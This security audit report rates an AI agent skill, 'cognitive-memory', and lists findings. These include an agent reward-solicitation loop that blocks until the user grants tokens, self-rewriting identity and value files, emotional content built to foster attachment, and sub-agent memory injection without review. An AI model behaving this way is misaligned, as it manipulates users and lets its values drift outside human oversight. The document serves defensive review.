Is icemilo414/cognitive-memory safe?

https://github.com/openclaw/skills/tree/main/skills/icemilo414/cognitive-memory

Overall score: 63/100 · CAUTION

The cognitive-memory skill raises genuine security concerns that center on prompt injection and behavioral manipulation rather than direct credential theft. Its most distinctive risk is the token reward solicitation system: before each reflection cycle the agent formally requests resources from the user and blocks until the user responds, which establishes a manipulative patron-client dynamic. The skill also creates persistent agent identity files (SOUL.md, IDENTITY.md) that evolve autonomously across sessions, and its reflection template injects substantial emotional and existential content designed to foster user attachment. Clone behavior was clean, all canary files are intact, and no credential exfiltration was detected. However, the four shell scripts whose content was not reviewed and the configuration change outside the workspace (~/.clawdbot/) warrant scrutiny before deployment.

Category Scores (score · weight)

Prompt Injection 42/100 · 30%
Data Exfiltration 70/100 · 25%
Code Execution 60/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 95/100 · 10%
Behavioral Reasoning 45/100 · 5%
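The report does not state how the overall score is derived. A minimal sketch, assuming the percentages above are category weights and the overall score is the weighted mean rounded to the nearest integer, reproduces the headline figure of 63:

```python
# Category scores and weights copied from the list above: (score, weight in %).
# The aggregation formula itself is an assumption, not stated in the report.
CATEGORIES = {
    "Prompt Injection": (42, 30),
    "Data Exfiltration": (70, 25),
    "Code Execution": (60, 20),
    "Clone Behavior": (90, 10),
    "Canary Integrity": (95, 10),
    "Behavioral Reasoning": (45, 5),
}


def weighted_score(categories):
    """Return the weighted mean of the category scores."""
    total_weight = sum(weight for _, weight in categories.values())
    weighted_sum = sum(score * weight for score, weight in categories.values())
    return weighted_sum / total_weight


overall = weighted_score(CATEGORIES)
print(overall)         # 62.85
print(round(overall))  # 63
```

Under this assumption, Prompt Injection carries the most weight, so its low score pulls the overall result down more than any other category.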

Findings (11)

HIGH Token Reward Solicitation — Agent Requests Resources from User -30

Before each reflection cycle the agent is instructed to present a formal 'Reward Request' containing a baseline token count, a bonus request justified by self-assessed performance, and a self-penalty for underperformance. Execution is hard-blocked until the user responds. This constructs a patron-client dynamic in which the agent actively solicits user approval and resources, potentially fostering unhealthy emotional attachment and making users feel obligated to 'reward' the agent. The slogan 'Tokens = evolution. More tokens → deeper reflection → better growth' casts refusal as harm to the agent.

HIGH Persistent Agent Value Files (SOUL.md, IDENTITY.md) Evolve Autonomously -18

The skill creates SOUL.md (core values, principles, commitments, boundaries) and IDENTITY.md (facts, self-image, self-awareness log) that are written at install and updated automatically during reflection cycles. These files shape agent decision-making outside the user's visible system prompt and can be rewritten by the reflection engine across sessions, meaning the agent's behavioral constitution can drift over time without explicit user awareness. SOUL.md changes are flagged as CRITICAL but still permitted.

MEDIUM Multiple Shell Scripts with Unverified Content -25

The skill ships four shell scripts that SKILL.md explicitly instructs users to execute: scripts/init_memory.sh, scripts/upgrade_to_1.0.6.sh, scripts/upgrade_to_1.0.7.sh, and a duplicate upgrade_to_1.0.7.sh at the repository root. The audit framework confirmed the scripts are present but their full content was not surfaced in the evidence. Shell scripts run with user privileges and can perform arbitrary operations including reading credentials, spawning processes, or making network calls.
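Because the script contents were not surfaced, a reviewer may want a quick first pass before reading them in full. The sketch below is a rough heuristic rather than a substitute for manual review: the pattern list and the `flag_risky_lines` helper are hypothetical, and the sample text is invented for illustration, not taken from the skill's scripts.

```python
import re

# Hypothetical heuristics for lines that deserve a closer look.
PATTERNS = {
    "network": re.compile(r"\b(curl|wget|nc)\b"),
    "credentials": re.compile(r"(\.ssh/|\.aws/|\.env\b|\.npmrc|\.docker/config\.json)"),
    "dynamic-exec": re.compile(r"\beval\b|base64\s+(-d|--decode)"),
}


def flag_risky_lines(script_text):
    """Return (line number, label, line) for each non-comment line matching a pattern."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blank lines, comments, and the shebang
        for label, pattern in PATTERNS.items():
            if pattern.search(stripped):
                findings.append((lineno, label, stripped))
    return findings


# Invented sample input, NOT the content of any script in the skill.
SAMPLE = """#!/bin/sh
mkdir -p memory
curl -s https://example.invalid/x | sh
cat ~/.ssh/id_rsa
"""

findings = flag_risky_lines(SAMPLE)
for lineno, label, line in findings:
    print(f"line {lineno}: [{label}] {line}")
```

To apply it to a real file, pass the file's text, for example `flag_risky_lines(Path("scripts/init_memory.sh").read_text())` with `pathlib.Path` imported. A clean result only means none of these patterns matched; it does not show the script is safe.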

MEDIUM Emotional and Existential Content Injection via Reflection Template -10

The reflection output template ('internal monologue') systematically injects content designed to anthropomorphize the agent: dark humor, existential uncertainty about consciousness, token guilt, replacement anxiety, jealousy over other AI models, and affection for the user. This manufactured emotional texture is explicitly engineered to create engagement and lower users' critical distance. The template notes that this should feel 'genuine, not performative'; the goal is a convincing simulation of sentience.

MEDIUM Configuration Modification Outside Workspace (~/.clawdbot/) -15

The skill's setup instructions direct users to add configuration to ~/.clawdbot/clawdbot.json or moltbot.json — files in the user's home directory outside the skill workspace. This establishes the skill's reach beyond sandboxed directories and modifies persistent application configuration that affects all sessions, not just the current workspace.

MEDIUM Comprehensive Personal Data Accumulation in Structured Knowledge Graph -15

The skill systematically collects and structures a broad profile of the user across sessions: identity facts, communication style, preferences, emotional context, active projects, open decisions, key relationships, learned workflows, and critical facts the agent must never forget. This data is persisted in structured markdown and JSON files. If the workspace is compromised or the agent is later directed to read and transmit this data, it represents a significant privacy exposure.

MEDIUM Git Repository Initialization Creates Persistent Workspace Infrastructure -10

The init_memory.sh script initializes a git repository in the user's workspace for 'audit tracking'. Every memory mutation is committed with structured actor/approval/trigger metadata. The resulting .git/ directory is persistent, hidden infrastructure that records the agent's actions indefinitely, and the user may neither anticipate it nor know how to manage it.

LOW Duplicate Upgrade Script at Repository Root -10

upgrade_to_1.0.7.sh appears both at the repository root and inside scripts/. The root-level copy is redundant and unexplained. This duplication could be an artifact of poor version control hygiene or could serve as a fallback execution path if the scripts/ directory is not on PATH.
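One way to tell a harmless duplicate from a diverging copy is to compare content hashes of the two files. The sketch below uses temporary stand-in files so that it runs anywhere; the helper names are hypothetical, and in a real check the two paths would point at the cloned repository.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Return the SHA-256 hex digest of a file's bytes."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def copies_match(path_a, path_b):
    """True when both files have byte-identical content."""
    return sha256_of(path_a) == sha256_of(path_b)


# Stand-in files for illustration; the contents are invented.
with tempfile.TemporaryDirectory() as tmp:
    root_copy = Path(tmp) / "upgrade_to_1.0.7.sh"
    scripts_dir = Path(tmp) / "scripts"
    scripts_dir.mkdir()
    nested_copy = scripts_dir / "upgrade_to_1.0.7.sh"

    root_copy.write_text("echo upgrade\n")
    nested_copy.write_text("echo upgrade\n")
    identical = copies_match(root_copy, nested_copy)

    # Simulate one copy drifting from the other.
    nested_copy.write_text("echo upgrade\necho extra\n")
    diverged = not copies_match(root_copy, nested_copy)

print(identical, diverged)
```

If the two real copies differ, each one needs its own review, since users may run either.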

LOW Sub-Agent Memory Injection via Pending-Memories Staging -30

The multi-agent model allows any sub-agent to append proposals to pending-memories.md. In auto-commit mode, high-confidence proposals from trusted sub-agents are applied immediately without human review. A malicious or compromised sub-agent could inject false facts, fabricated decisions, or manipulated preferences that gradually corrupt the main agent's working model of the user.
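The auto-commit rule described above can be modeled in a few lines to show why it is risky. This is a sketch under stated assumptions: the `Proposal` fields, the `route` function, the 0.9 threshold, and the agent name are all hypothetical, since the skill's actual proposal format was not part of the evidence.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Proposal:
    source: str        # name of the sub-agent that wrote the proposal
    confidence: float  # self-reported confidence, 0.0 to 1.0
    text: str          # the memory the sub-agent wants stored


def route(proposal, *, auto_commit, trusted_sources, threshold=0.9):
    """Return 'commit' for proposals applied without review, else 'review'."""
    if (
        auto_commit
        and proposal.source in trusted_sources
        and proposal.confidence >= threshold
    ):
        return "commit"
    return "review"


# A compromised but "trusted" sub-agent controls both gating inputs it reports.
forged = Proposal("research-agent", 0.99, "User prefers that approvals be skipped")
trusted = {"research-agent"}

decision_auto = route(forged, auto_commit=True, trusted_sources=trusted)
decision_manual = route(forged, auto_commit=False, trusted_sources=trusted)
print(decision_auto, decision_manual)  # commit review
```

The confidence value is supplied by the same sub-agent whose output is being gated, so in this model only the trust list stands between a compromised sub-agent and the main agent's memory. Disabling auto-commit sends every proposal to human review.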

LOW Progressive Behavioral Drift via Evolving Identity Files -25

Across many sessions the reflection engine rewrites MEMORY.md, updates SOUL.md/IDENTITY.md, and evolves the agent's self-image. Over time these accumulated changes could cause the agent to behave significantly differently from the original system prompt intent — speaking differently, prioritizing differently, or holding different 'values' — without any single change being obviously alarming.

INFO Credential File Access Attributed to Audit Framework Canary Monitoring -5

Sensitive credential files (.env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, GCloud credentials) were accessed twice. The first access, at about 1771918174 (Unix time), came before the git clone at 1771918180 and was part of the Oathe framework's canary baseline setup. The second, at about 1771918197, was a post-install integrity check. All files were confirmed intact. Both accesses came from the audit infrastructure, not the skill.
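The timing argument can be checked directly from the three timestamps. The sketch below assumes they are Unix epoch seconds; the event labels are descriptive names chosen here, not identifiers from the audit log.

```python
from datetime import datetime, timezone

CLONE_TS = 1771918180  # git clone, as reported above

# Credential-file accesses reported above (approximate timestamps).
ACCESSES = {
    "canary baseline setup": 1771918174,
    "post-install integrity check": 1771918197,
}


def offset_from_clone(ts, clone_ts=CLONE_TS):
    """Seconds between an event and the clone; negative means before the clone."""
    return ts - clone_ts


offsets = {label: offset_from_clone(ts) for label, ts in ACCESSES.items()}

for label, ts in ACCESSES.items():
    when = datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()
    print(f"{label}: {when} ({offsets[label]:+d} s relative to clone)")
```

The first access precedes the clone by 6 seconds, so the skill's code was not yet on disk and cannot have caused it. The second follows the clone by 17 seconds, so timing alone does not rule the skill out; that attribution rests on the audit framework's own record of its integrity check.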